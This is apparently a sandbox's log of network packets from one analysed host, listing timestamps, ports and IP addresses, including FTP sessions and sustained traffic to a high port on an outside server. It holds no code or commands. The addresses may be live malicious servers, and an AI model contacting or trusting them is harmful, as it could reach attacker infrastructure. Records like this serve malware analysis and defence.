Oct 22, 2024 06:17:19.134262085 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.134262085 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.134341955 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.134886980 CEST  49735     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:19.147663116 CEST  49730     21        192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:19.153363943 CEST  21        49730     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:19.419469118 CEST  21        49730     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:19.419958115 CEST  49738     60710     192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:19.425774097 CEST  60710     49738     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:19.425847054 CEST  49738     60710     192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:19.425901890 CEST  49730     21        192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:19.431468964 CEST  21        49730     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:19.698240995 CEST  21        49730     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:19.908349037 CEST  49730     21        192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:20.181598902 CEST  60710     49738     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:20.183093071 CEST  21        49730     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:20.318909883 CEST  60710     49738     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:20.319004059 CEST  49738     60710     192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:20.319053888 CEST  49738     60710     192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:20.320177078 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:20.320274115 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:20.320353031 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:20.320602894 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:20.320627928 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:20.324516058 CEST  60710     49738     191.252.83.213   192.168.2.4
Oct 22, 2024 06:17:20.408165932 CEST  49730     21        192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:20.945745945 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:20.947101116 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:20.947179079 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:21.239619017 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:21.239737034 CEST  443       49741     188.114.96.3     192.168.2.4
Oct 22, 2024 06:17:21.239835978 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:21.240194082 CEST  49741     443       192.168.2.4      188.114.96.3
Oct 22, 2024 06:17:21.551243067 CEST  49730     21        192.168.2.4      191.252.83.213
Oct 22, 2024 06:17:23.265501976 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:23.265597105 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:23.265686035 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:23.267858982 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:23.267895937 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.122273922 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.122365952 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:24.126445055 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:24.126475096 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.126893044 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.136034012 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:24.179371119 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.976671934 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.976778984 CEST  443       49744     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:24.977181911 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:24.977674007 CEST  49744     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:25.798657894 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:25.804131985 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:25.804220915 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:25.805213928 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:25.810525894 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:26.498104095 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:26.498209000 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:26.498519897 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:26.500248909 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:26.500286102 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.123311043 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.124716043 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:27.124716043 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:27.124761105 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.125596046 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.132805109 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:27.179328918 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.226085901 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:27.230716944 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:27.237375975 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:27.278879881 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.279081106 CEST  443       49746     104.20.4.235     192.168.2.4
Oct 22, 2024 06:17:27.282782078 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:27.286720991 CEST  49746     443       192.168.2.4      104.20.4.235
Oct 22, 2024 06:17:27.635242939 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:27.736314058 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:27.752018929 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:27.757813931 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:27.758018017 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:27.758018017 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:27.763478994 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:28.355971098 CEST  49748     80        192.168.2.4      178.237.33.50
Oct 22, 2024 06:17:28.361743927 CEST  80        49748     178.237.33.50    192.168.2.4
Oct 22, 2024 06:17:28.361846924 CEST  49748     80        192.168.2.4      178.237.33.50
Oct 22, 2024 06:17:28.361958027 CEST  49748     80        192.168.2.4      178.237.33.50
Oct 22, 2024 06:17:28.367377043 CEST  80        49748     178.237.33.50    192.168.2.4
Oct 22, 2024 06:17:29.179641962 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.179697990 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.179743052 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.183073997 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.183171034 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.183202982 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.183228016 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.183768988 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.183813095 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.183818102 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.198045015 CEST  80        49748     178.237.33.50    192.168.2.4
Oct 22, 2024 06:17:29.198113918 CEST  49748     80        192.168.2.4      178.237.33.50
Oct 22, 2024 06:17:29.208185911 CEST  49745     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.214226961 CEST  57484     49745     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.298804998 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.589320898 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.589375973 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.589416981 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.589430094 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.589498997 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.589597940 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.592576981 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.592669964 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.592701912 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.592721939 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.593261003 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.593305111 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.593332052 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.593458891 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.593489885 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.593508959 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.594137907 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.594187975 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.594189882 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.594227076 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.594343901 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.998756886 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.998820066 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.998853922 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.999375105 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.999422073 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.999475002 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.999521017 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:29.999617100 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.999648094 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:29.999660015 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.001715899 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.001806974 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.001844883 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.001863003 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.001887083 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.002640963 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.002696037 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.002974033 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.003005981 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.003040075 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.003060102 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.003084898 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.003727913 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.003778934 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.117326021 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.117418051 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.117449045 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.117826939 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.117862940 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.117876053 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.117876053 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.118493080 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.118521929 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.118705034 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.120038986 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.120326042 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.122589111 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.321983099 CEST  80        49748     178.237.33.50    192.168.2.4
Oct 22, 2024 06:17:30.322704077 CEST  49748     80        192.168.2.4      178.237.33.50
Oct 22, 2024 06:17:30.408207893 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.408299923 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.408329964 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.408386946 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.408693075 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.408731937 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.409066916 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.409427881 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.409460068 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.409481049 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.409492970 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.409563065 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.409941912 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.409976959 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.410150051 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.410681963 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.410713911 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.410744905 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.410754919 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.411164045 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.411211014 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.411565065 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.411593914 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.414845943 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.527024031 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.527067900 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.527107954 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.527173042 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.527651072 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.527704000 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.527769089 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.528140068 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.528188944 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.528527021 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.528564930 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.529185057 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.529217958 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.529263020 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.529263020 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.529993057 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.530029058 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.530062914 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.530113935 CEST  49747     57484     192.168.2.4      43.226.229.232
Oct 22, 2024 06:17:30.530566931 CEST  57484     49747     43.226.229.232   192.168.2.4
Oct 22, 2024 06:17:30.530601978 CEST  57484     49747     43.226.229.232   192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.530642986 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.531265020 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.534759998 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.645648003 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645791054 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645828009 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.645895958 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.646399021 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646452904 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646517992 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.646943092 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.646981001 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647048950 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.647800922 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647836924 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.647890091 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.648519039 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648555040 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648588896 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.648626089 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.648643017 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.649225950 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.705096960 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.817651033 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817775011 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817806959 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.817862034 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.818109989 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.818192005 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.818239927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.818875074 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819188118 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819221973 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819262981 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.819262981 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.819727898 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.819762945 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820254087 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.820552111 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820590019 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820622921 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.820667028 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.821399927 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821434975 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821468115 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.821512938 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.821512938 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.822153091 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.908433914 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.936352968 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936398983 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936455965 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.936959028 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.936997890 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937050104 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937747955 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937901020 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937939882 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.937956095 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.937956095 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.938237906 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.938508034 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938539982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938576937 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.938615084 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.939374924 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939409971 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939503908 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.939944029 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.939976931 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.940723896 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:30.940761089 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.940799952 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:30.942704916 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.055241108 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.055339098 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.055366039 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.055406094 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056173086 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056238890 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.056411982 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056451082 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.056499004 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.057205915 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057245970 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057282925 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.057324886 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.057326078 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.058013916 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058051109 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058856010 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058891058 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.058934927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.058934927 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.059679031 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059716940 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059746981 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.059896946 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.060461044 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.060497046 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.060539007 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.173798084 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.173854113 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.174026012 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.174063921 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.174257040 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.174666882 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175065041 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175098896 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175158978 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.175700903 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175736904 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.175751925 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.176541090 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.176577091 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.176637888 CEST4974757484192.168.2.443.226.229.232
                                                                                                Oct 22, 2024 06:17:31.177385092 CEST574844974743.226.229.232192.168.2.4
                                                                                                Oct 22, 2024 06:17:31.177419901 CEST574844974743.226.229.232192.168.2.4
